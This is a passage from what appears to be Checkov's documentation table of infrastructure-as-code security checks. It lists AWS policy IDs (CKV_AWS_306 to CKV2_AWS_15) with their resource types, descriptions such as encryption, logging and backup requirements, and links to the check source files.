[CloudfrontDistributionDefaultRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionDefaultRoot.py) | -| 739 | CKV_AWS_306 | resource | aws_sagemaker_notebook_instance | Ensure SageMaker notebook instances should be launched into a custom VPC | Terraform | [SagemakerNotebookInCustomVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerNotebookInCustomVPC.py) | -| 740 | CKV_AWS_307 | resource | aws_sagemaker_notebook_instance | Ensure SageMaker Users should not have root access to SageMaker notebook instances | Terraform | [SagemakerNotebookRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerNotebookRoot.py) | -| 741 | CKV_AWS_308 | resource | aws_api_gateway_method_settings | Ensure API Gateway method setting caching is set to encrypted | Terraform | [APIGatewayMethodSettingsCacheEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayMethodSettingsCacheEncrypted.py) | -| 742 | CKV_AWS_309 | resource | aws_apigatewayv2_route | Ensure API GatewayV2 routes specify an authorization type | Terraform | [APIGatewayV2RouteDefinesAuthorizationType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayV2RouteDefinesAuthorizationType.py) | -| 743 | CKV_AWS_310 | resource | aws_cloudfront_distribution | Ensure CloudFront distributions should have origin failover configured | Terraform | [CloudfrontDistributionOriginFailover.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionOriginFailover.py) | -| 744 | CKV_AWS_311 | resource | aws_codebuild_project | Ensure that CodeBuild S3 logs are encrypted | Terraform | 
[CodebuildS3LogsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodebuildS3LogsEncrypted.py) | -| 745 | CKV_AWS_312 | resource | aws_elastic_beanstalk_environment | Ensure Elastic Beanstalk environments have enhanced health reporting enabled | Terraform | [ElasticBeanstalkUseEnhancedHealthChecks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticBeanstalkUseEnhancedHealthChecks.py) | -| 746 | CKV_AWS_313 | resource | aws_rds_cluster | Ensure RDS cluster configured to copy tags to snapshots | Terraform | [RDSClusterCopyTags.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterCopyTags.py) | -| 747 | CKV_AWS_314 | resource | aws_codebuild_project | Ensure CodeBuild project environments have a logging configuration | Terraform | [CodebuildHasLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodebuildHasLogs.py) | -| 748 | CKV_AWS_315 | resource | aws_autoscaling_group | Ensure EC2 Auto Scaling groups use EC2 launch templates | Terraform | [AutoScalingLaunchTemplate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AutoScalingLaunchTemplate.py) | -| 749 | CKV_AWS_316 | resource | aws_codebuild_project | Ensure CodeBuild project environments do not have privileged mode enabled | Terraform | [CodeBuildPrivilegedMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodeBuildPrivilegedMode.py) | -| 750 | CKV_AWS_317 | resource | AWS::Elasticsearch::Domain | Ensure Elasticsearch Domain Audit Logging is enabled | Cloudformation | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainAuditLogging.py) | -| 751 | CKV_AWS_317 | resource | AWS::OpenSearchService::Domain | Ensure Elasticsearch Domain Audit 
Logging is enabled | Cloudformation | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainAuditLogging.py) | -| 752 | CKV_AWS_317 | resource | aws_elasticsearch_domain | Ensure Elasticsearch Domain Audit Logging is enabled | Terraform | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainAuditLogging.py) | -| 753 | CKV_AWS_317 | resource | aws_opensearch_domain | Ensure Elasticsearch Domain Audit Logging is enabled | Terraform | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainAuditLogging.py) | -| 754 | CKV_AWS_318 | resource | aws_elasticsearch_domain | Ensure Elasticsearch domains are configured with at least three dedicated master nodes for HA | Terraform | [ElasticsearchDomainHA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainHA.py) | -| 755 | CKV_AWS_318 | resource | aws_opensearch_domain | Ensure Elasticsearch domains are configured with at least three dedicated master nodes for HA | Terraform | [ElasticsearchDomainHA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainHA.py) | -| 756 | CKV_AWS_319 | resource | aws_cloudwatch_metric_alarm | Ensure that CloudWatch alarm actions are enabled | Terraform | [CloudWatchAlarmsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudWatchAlarmsEnabled.py) | -| 757 | CKV_AWS_320 | resource | aws_redshift_cluster | Ensure Redshift clusters do not use the default database name | Terraform | [RedshiftClusterDatabaseName.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterDatabaseName.py) | -| 758 | CKV_AWS_321 | resource 
| aws_redshift_cluster | Ensure Redshift clusters use enhanced VPC routing | Terraform | [RedshiftClusterUseEnhancedVPCRouting.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterUseEnhancedVPCRouting.py) | -| 759 | CKV_AWS_322 | resource | aws_elasticache_cluster | Ensure ElastiCache for Redis cache clusters have auto minor version upgrades enabled | Terraform | [ElasticCacheAutomaticMinorUpgrades.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticCacheAutomaticMinorUpgrades.py) | -| 760 | CKV_AWS_323 | resource | aws_elasticache_cluster | Ensure ElastiCache clusters do not use the default subnet group | Terraform | [ElastiCacheHasCustomSubnet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElastiCacheHasCustomSubnet.py) | -| 761 | CKV_AWS_324 | resource | aws_rds_cluster | Ensure that RDS Cluster log capture is enabled | Terraform | [RDSClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterLogging.py) | -| 762 | CKV_AWS_325 | resource | aws_rds_cluster | Ensure that RDS Cluster audit logging is enabled for MySQL engine | Terraform | [RDSClusterAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterAuditLogging.py) | -| 763 | CKV_AWS_326 | resource | aws_rds_cluster | Ensure that RDS Aurora Clusters have backtracking enabled | Terraform | [RDSClusterAuroraBacktrack.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterAuroraBacktrack.py) | -| 764 | CKV_AWS_327 | resource | aws_rds_cluster | Ensure RDS Clusters are encrypted using KMS CMKs | Terraform | [RDSClusterEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterEncryptedWithCMK.py) | -| 765 | CKV_AWS_328 | resource | aws_alb | Ensure 
that ALB is configured with defensive or strictest desync mitigation mode | Terraform | [ALBDesyncMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDesyncMode.py) | -| 766 | CKV_AWS_328 | resource | aws_elb | Ensure that ALB is configured with defensive or strictest desync mitigation mode | Terraform | [ALBDesyncMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDesyncMode.py) | -| 767 | CKV_AWS_328 | resource | aws_lb | Ensure that ALB is configured with defensive or strictest desync mitigation mode | Terraform | [ALBDesyncMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDesyncMode.py) | -| 768 | CKV_AWS_329 | resource | aws_efs_access_point | EFS access points should enforce a root directory | Terraform | [EFSAccessPointRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EFSAccessPointRoot.py) | -| 769 | CKV_AWS_330 | resource | aws_efs_access_point | EFS access points should enforce a user identity | Terraform | [EFSAccessUserIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EFSAccessUserIdentity.py) | -| 770 | CKV_AWS_331 | resource | aws_ec2_transit_gateway | Ensure Transit Gateways do not automatically accept VPC attachment requests | Terraform | [Ec2TransitGatewayAutoAccept.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/Ec2TransitGatewayAutoAccept.py) | -| 771 | CKV_AWS_332 | resource | aws_ecs_service | Ensure ECS Fargate services run on the latest Fargate platform version | Terraform | [ECSServiceFargateLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSServiceFargateLatest.py) | -| 772 | CKV_AWS_333 | resource | aws_ecs_service | Ensure ECS services do not have public IP addresses assigned to them automatically | 
Terraform | [ECSServicePublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSServicePublicIP.py) | -| 773 | CKV_AWS_334 | resource | aws_ecs_task_definition | Ensure ECS containers should run as non-privileged | Terraform | [ECSContainerPrivilege.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSContainerPrivilege.py) | -| 774 | CKV_AWS_335 | resource | aws_ecs_task_definition | Ensure ECS task definitions should not share the host's process namespace | Terraform | [ECSContainerHostProcess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSContainerHostProcess.py) | -| 775 | CKV_AWS_336 | resource | aws_ecs_task_definition | Ensure ECS containers are limited to read-only access to root filesystems | Terraform | [ECSContainerReadOnlyRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSContainerReadOnlyRoot.py) | -| 776 | CKV_AWS_337 | resource | aws_ssm_parameter | Ensure SSM parameters are using KMS CMK | Terraform | [SSMParameterUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SSMParameterUsesCMK.py) | -| 777 | CKV_AWS_338 | resource | aws_cloudwatch_log_group | Ensure CloudWatch log groups retains logs for at least 1 year | Terraform | [CloudWatchLogGroupRetentionYear.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudWatchLogGroupRetentionYear.py) | -| 778 | CKV_AWS_339 | resource | aws_eks_cluster | Ensure EKS clusters run on a supported Kubernetes version | Terraform | [EKSPlatformVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSPlatformVersion.py) | -| 779 | CKV_AWS_340 | resource | aws_elastic_beanstalk_environment | Ensure Elastic Beanstalk managed platform updates are enabled | Terraform | 
[ElasticBeanstalkUseManagedUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticBeanstalkUseManagedUpdates.py) | -| 780 | CKV_AWS_341 | resource | aws_launch_configuration | Ensure Launch template should not have a metadata response hop limit greater than 1 | Terraform | [LaunchTemplateMetadataHop.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LaunchTemplateMetadataHop.py) | -| 781 | CKV_AWS_341 | resource | aws_launch_template | Ensure Launch template should not have a metadata response hop limit greater than 1 | Terraform | [LaunchTemplateMetadataHop.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LaunchTemplateMetadataHop.py) | -| 782 | CKV_AWS_342 | resource | aws_waf_rule_group | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) | -| 783 | CKV_AWS_342 | resource | aws_waf_web_acl | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) | -| 784 | CKV_AWS_342 | resource | aws_wafregional_rule_group | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) | -| 785 | CKV_AWS_342 | resource | aws_wafregional_web_acl | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) | -| 786 | CKV_AWS_342 | resource | aws_wafv2_rule_group | Ensure WAF rule has any actions | Terraform | 
[WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) | -| 787 | CKV_AWS_342 | resource | aws_wafv2_web_acl | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) | -| 788 | CKV_AWS_343 | resource | aws_redshift_cluster | Ensure Amazon Redshift clusters should have automatic snapshots enabled | Terraform | [RedshiftClusterAutoSnap.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterAutoSnap.py) | -| 789 | CKV_AWS_344 | resource | aws_networkfirewall_firewall | Ensure that Network firewalls have deletion protection enabled | Terraform | [NetworkFirewallDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkFirewallDeletionProtection.py) | -| 790 | CKV_AWS_345 | resource | aws_networkfirewall_firewall | Ensure that Network firewall encryption is via a CMK | Terraform | [NetworkFirewallUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkFirewallUsesCMK.py) | -| 791 | CKV_AWS_345 | resource | aws_networkfirewall_rule_group | Ensure that Network firewall encryption is via a CMK | Terraform | [NetworkFirewallUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkFirewallUsesCMK.py) | -| 792 | CKV_AWS_346 | resource | aws_networkfirewall_firewall_policy | Ensure Network Firewall Policy defines an encryption configuration that uses a customer managed Key (CMK) | Terraform | [NetworkFirewallPolicyDefinesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkFirewallPolicyDefinesCMK.py) | -| 793 | CKV_AWS_347 | resource | aws_neptune_cluster | Ensure Neptune is encrypted by KMS using a customer 
managed Key (CMK) | Terraform | [NeptuneClusterEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterEncryptedWithCMK.py) | -| 794 | CKV_AWS_348 | resource | aws_iam_access_key | Ensure IAM root user doesnt have Access keys | Terraform | [IAMUserRootAccessKeys.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMUserRootAccessKeys.py) | -| 795 | CKV_AWS_349 | resource | aws_emr_security_configuration | Ensure EMR Cluster security configuration encrypts local disks | Terraform | [EMRClusterConfEncryptsLocalDisk.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterConfEncryptsLocalDisk.py) | -| 796 | CKV_AWS_350 | resource | aws_emr_security_configuration | Ensure EMR Cluster security configuration encrypts EBS disks | Terraform | [EMRClusterConfEncryptsEBS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterConfEncryptsEBS.py) | -| 797 | CKV_AWS_351 | resource | aws_emr_security_configuration | Ensure EMR Cluster security configuration encrypts InTransit | Terraform | [EMRClusterConfEncryptsInTransit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterConfEncryptsInTransit.py) | -| 798 | CKV_AWS_352 | resource | aws_network_acl_rule | Ensure NACL ingress does not allow all Ports | Terraform | [NetworkACLUnrestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestricted.py) | -| 799 | CKV_AWS_353 | resource | aws_db_instance | Ensure that RDS instances have performance insights enabled | Terraform | [RDSInstancePerformanceInsights.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstancePerformanceInsights.py) | -| 800 | CKV_AWS_353 | resource | aws_rds_cluster_instance | Ensure that RDS instances have 
performance insights enabled | Terraform | [RDSInstancePerformanceInsights.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstancePerformanceInsights.py) | -| 801 | CKV_AWS_354 | resource | aws_db_instance | Ensure RDS Performance Insights are encrypted using KMS CMKs | Terraform | [RDSInstancePerfInsightsEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstancePerfInsightsEncryptionWithCMK.py) | -| 802 | CKV_AWS_354 | resource | aws_rds_cluster_instance | Ensure RDS Performance Insights are encrypted using KMS CMKs | Terraform | [RDSInstancePerfInsightsEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstancePerfInsightsEncryptionWithCMK.py) | -| 803 | CKV_AWS_355 | resource | aws_iam_group_policy | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py) | -| 804 | CKV_AWS_355 | resource | aws_iam_policy | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py) | -| 805 | CKV_AWS_355 | resource | aws_iam_role_policy | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py) | -| 806 | CKV_AWS_355 | resource | aws_iam_user_policy | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | 
[IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py) | -| 807 | CKV_AWS_355 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py) | -| 808 | CKV_AWS_356 | data | aws_iam_policy_document | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [ResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/ResourcePolicyDocument.py) | -| 809 | CKV_AWS_357 | resource | aws_transfer_server | Ensure Transfer Server allows only secure protocols | Terraform | [TransferServerAllowsOnlySecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/TransferServerAllowsOnlySecureProtocols.py) | -| 810 | CKV_AWS_358 | data | aws_iam_policy_document | Ensure GitHub Actions OIDC trust policies only allows actions from a specific known organization | Terraform | [GithubActionsOIDCTrustPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/GithubActionsOIDCTrustPolicy.py) | -| 811 | CKV_AWS_359 | resource | aws_neptune_cluster | Neptune DB clusters should have IAM database authentication enabled | Terraform | [NeptuneDBClustersIAMDatabaseAuthenticationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneDBClustersIAMDatabaseAuthenticationEnabled.py) | -| 812 | CKV_AWS_360 | resource | AWS::DocDB::DBCluster | Ensure DocumentDB has an adequate backup retention period | Cloudformation | 
[DocDBBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBBackupRetention.py) | -| 813 | CKV_AWS_360 | resource | aws_docdb_cluster | Ensure DocumentDB has an adequate backup retention period | Terraform | [DocDBBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBBackupRetention.py) | -| 814 | CKV_AWS_361 | resource | AWS::Neptune::DBCluster | Ensure that Neptune DB cluster has automated backups enabled with adequate retention | Cloudformation | [NeptuneClusterBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/NeptuneClusterBackupRetention.py) | -| 815 | CKV_AWS_361 | resource | aws_neptune_cluster | Ensure that Neptune DB cluster has automated backups enabled with adequate retention | Terraform | [NeptuneClusterBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterBackupRetention.py) | -| 816 | CKV_AWS_362 | resource | aws_neptune_cluster | Neptune DB clusters should be configured to copy tags to snapshots | Terraform | [NeptuneDBClustersCopyTagsToSnapshots.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneDBClustersCopyTagsToSnapshots.py) | -| 817 | CKV_AWS_363 | resource | AWS::Lambda::Function | Ensure Lambda Runtime is not deprecated | Cloudformation | [DeprecatedLambdaRuntime.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DeprecatedLambdaRuntime.py) | -| 818 | CKV_AWS_363 | resource | AWS::Serverless::Function | Ensure Lambda Runtime is not deprecated | Cloudformation | [DeprecatedLambdaRuntime.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DeprecatedLambdaRuntime.py) | -| 819 | CKV_AWS_363 | resource | aws_lambda_function | Ensure Lambda Runtime is not 
deprecated | Terraform | [DeprecatedLambdaRuntime.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DeprecatedLambdaRuntime.py) | -| 820 | CKV_AWS_364 | resource | AWS::Lambda::Permission | Ensure that AWS Lambda function permissions delegated to AWS services are limited by SourceArn or SourceAccount | Cloudformation | [LambdaServicePermission.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaServicePermission.py) | -| 821 | CKV_AWS_364 | resource | aws_lambda_permission | Ensure that AWS Lambda function permissions delegated to AWS services are limited by SourceArn or SourceAccount | Terraform | [LambdaServicePermission.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaServicePermission.py) | -| 822 | CKV_AWS_365 | resource | aws_ses_configuration_set | Ensure SES Configuration Set enforces TLS usage | Terraform | [SesConfigurationSetDefinesTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SesConfigurationSetDefinesTLS.py) | -| 823 | CKV2_AWS_1 | resource | aws_network_acl | Ensure that all NACL are attached to subnets | Terraform | [SubnetHasACL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SubnetHasACL.yaml) | -| 824 | CKV2_AWS_1 | resource | aws_subnet | Ensure that all NACL are attached to subnets | Terraform | [SubnetHasACL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SubnetHasACL.yaml) | -| 825 | CKV2_AWS_2 | resource | aws_ebs_volume | Ensure that only encrypted EBS volumes are attached to EC2 instances | Terraform | [EncryptedEBSVolumeOnlyConnectedToEC2s.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EncryptedEBSVolumeOnlyConnectedToEC2s.yaml) | -| 826 | CKV2_AWS_2 | resource | aws_volume_attachment | Ensure that only 
encrypted EBS volumes are attached to EC2 instances | Terraform | [EncryptedEBSVolumeOnlyConnectedToEC2s.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EncryptedEBSVolumeOnlyConnectedToEC2s.yaml) | -| 827 | CKV2_AWS_3 | resource | aws_guardduty_detector | Ensure GuardDuty is enabled to specific org/region | Terraform | [GuardDutyIsEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/GuardDutyIsEnabled.yaml) | -| 828 | CKV2_AWS_3 | resource | aws_guardduty_organization_configuration | Ensure GuardDuty is enabled to specific org/region | Terraform | [GuardDutyIsEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/GuardDutyIsEnabled.yaml) | -| 829 | CKV2_AWS_4 | resource | aws_api_gateway_method_settings | Ensure API Gateway stage have logging level defined as appropriate | Terraform | [APIGWLoggingLevelsDefinedProperly.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGWLoggingLevelsDefinedProperly.yaml) | -| 830 | CKV2_AWS_4 | resource | aws_api_gateway_stage | Ensure API Gateway stage have logging level defined as appropriate | Terraform | [APIGWLoggingLevelsDefinedProperly.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGWLoggingLevelsDefinedProperly.yaml) | -| 831 | CKV2_AWS_5 | resource | aws_security_group | Ensure that Security Groups are attached to another resource | Terraform | [SGAttachedToResource.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SGAttachedToResource.yaml) | -| 832 | CKV2_AWS_6 | resource | aws_s3_bucket | Ensure that S3 bucket has a Public Access block | Terraform | [S3BucketHasPublicAccessBlock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketHasPublicAccessBlock.yaml) | -| 833 
| CKV2_AWS_6 | resource | aws_s3_bucket_public_access_block | Ensure that S3 bucket has a Public Access block | Terraform | [S3BucketHasPublicAccessBlock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketHasPublicAccessBlock.yaml) | -| 834 | CKV2_AWS_7 | resource | aws_emr_cluster | Ensure that Amazon EMR clusters' security groups are not open to the world | Terraform | [AMRClustersNotOpenToInternet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AMRClustersNotOpenToInternet.yaml) | -| 835 | CKV2_AWS_7 | resource | aws_security_group | Ensure that Amazon EMR clusters' security groups are not open to the world | Terraform | [AMRClustersNotOpenToInternet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AMRClustersNotOpenToInternet.yaml) | -| 836 | CKV2_AWS_8 | resource | aws_rds_cluster | Ensure that RDS clusters has backup plan of AWS Backup | Terraform | [RDSClusterHasBackupPlan.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/RDSClusterHasBackupPlan.yaml) | -| 837 | CKV2_AWS_9 | resource | aws_backup_selection | Ensure that EBS are added in the backup plans of AWS Backup | Terraform | [EBSAddedBackup.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EBSAddedBackup.yaml) | -| 838 | CKV2_AWS_10 | resource | aws_cloudtrail | Ensure CloudTrail trails are integrated with CloudWatch Logs | Terraform | [CloudtrailHasCloudwatch.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudtrailHasCloudwatch.yaml) | -| 839 | CKV2_AWS_11 | resource | aws_vpc | Ensure VPC flow logging is enabled in all VPCs | Terraform | [VPCHasFlowLog.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCHasFlowLog.yaml) | -| 840 | CKV2_AWS_12 | resource | 
aws_default_security_group | Ensure the default security group of every VPC restricts all traffic | Terraform | [VPCHasRestrictedSG.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCHasRestrictedSG.yaml) | -| 841 | CKV2_AWS_12 | resource | aws_vpc | Ensure the default security group of every VPC restricts all traffic | Terraform | [VPCHasRestrictedSG.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCHasRestrictedSG.yaml) | -| 842 | CKV2_AWS_14 | resource | aws_iam_group | Ensure that IAM groups includes at least one IAM user | Terraform | [IAMGroupHasAtLeastOneUser.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMGroupHasAtLeastOneUser.yaml) | -| 843 | CKV2_AWS_14 | resource | aws_iam_group_membership | Ensure that IAM groups includes at least one IAM user | Terraform | [IAMGroupHasAtLeastOneUser.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMGroupHasAtLeastOneUser.yaml) | -| 844 | CKV2_AWS_15 | resource | aws_autoscaling_group | Ensure that auto Scaling groups that are associated with a load balancer are using Elastic Load Balancing health checks. | Terraform | [AutoScallingEnabledELB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScallingEnabledELB.yaml) | -| 845 | CKV2_AWS_15 | resource | aws_elb | Ensure that auto Scaling groups that are associated with a load balancer are using Elastic Load Balancing health checks. | Terraform | 